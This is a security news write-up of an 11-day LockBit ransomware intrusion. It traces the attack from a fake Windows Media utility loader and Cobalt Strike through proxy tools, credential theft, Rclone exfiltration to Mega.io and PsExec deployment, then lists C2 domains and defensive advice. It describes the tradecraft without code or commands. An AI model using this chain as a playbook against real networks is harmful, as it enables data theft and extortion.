A well-coordinated cyber intrusion, spanning 11 days, culminated in the deployment of LockBit ransomware across a corporate environment.
The attack, which began with the execution of a malicious file posing as a Windows Media Configuration Utility, displayed a sophisticated playbook leveraging Cobalt Strike, advanced persistence mechanisms, lateral movement, data exfiltration tools, and an eventual ransomware payload.
Cobalt Strike Deployment
The attack commenced in January 2024 with a targeted phishing lure.
The victim downloaded and executed a malicious file (setup_wm.exe) mimicking the Windows Media Configuration Utility.
This file acted as a loader for a Cobalt Strike beacon, a prominent threat actor tool for post-exploitation, establishing an initial Command and Control (C2) connection.
Within 30 minutes, the attackers escalated their foothold, deploying discovery commands to identify domain controllers and leveraging elevated privileges of the compromised user.
The attackers installed two proxy tools, SystemBC and GhostSOCKS, on the domain controller.
While GhostSOCKS was detected and blocked by Windows Defender, SystemBC remained operational, enabling continued command and control communications.
Sophisticated persistence techniques were observed throughout the intrusion.
Scheduled tasks were widely deployed to trigger malicious binaries like SystemBC and GhostSOCKS.
Additionally, registry-based run keys ensured the automatic execution of payloads on user login.
To evade detection, the adversaries manipulated group policies to disable Windows Defender protections and employed process injection techniques to blend malicious activities into legitimate processes such as WUAUCLT.exe.
The attackers demonstrated advanced lateral movement capabilities. Using Remote Desktop Protocol (RDP), Windows Remote Management (WinRM), and SMB, they spread across the network, deploying secondary payloads on file servers and backup servers.
Notably, they leveraged tools such as Rclone for data exfiltration. Despite initial failed attempts to use FTP servers for exfiltration, the adversaries pivoted to Mega.io, achieving large-scale data transfers over 16 hours.
The attackers also accessed sensitive documents containing stored credentials and executed scripts like Veeam-Get-Creds.ps1 to extract backup software passwords.
They employed reconnaissance tools such as Seatbelt and SharpView to map the Active Directory environment and identify high-value targets.
LockBit Ransomware Deployment
After a 15-hour operational lull, the attackers shifted focus to their objective—ransomware deployment.
On the eleventh day, they staged the LockBit ransomware binary on a backup server and executed batch scripts to propagate the payload across all networked Windows hosts.
Tools like PsExec and WMI were used to distribute and execute the ransomware, while additional scripts disabled security mechanisms such as Windows Defender.
According to The DFIR Report, the deployment achieved complete encryption of targeted hosts within two hours.
Affected systems displayed a ransom note from LockBit, instructing victims to initiate negotiations.
This operation highlights the evolving sophistication of ransomware campaigns, where attackers integrate data exfiltration with ransomware deployment, amplifying the pressure on victims.
Key indicators of compromise (IoCs) in this intrusion include:
- C2 Domains:
compdatasystems.com,retailadvertisingservices.com - Proxy Tools: SystemBC and GhostSOCKS binaries
- Data Exfiltration Tools: Rclone targeting Mega.io and FTP servers
The coordinated use of Cobalt Strike, persistence mechanisms, and advanced lateral movement tactics underscores the necessity of layered cybersecurity defenses.
Organizations are advised to implement active monitoring of scheduled tasks, registry changes, and network traffic, alongside regular patching and incident response simulations to mitigate such high-impact incidents.
Are you from SOC/DFIR Teams? - Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free
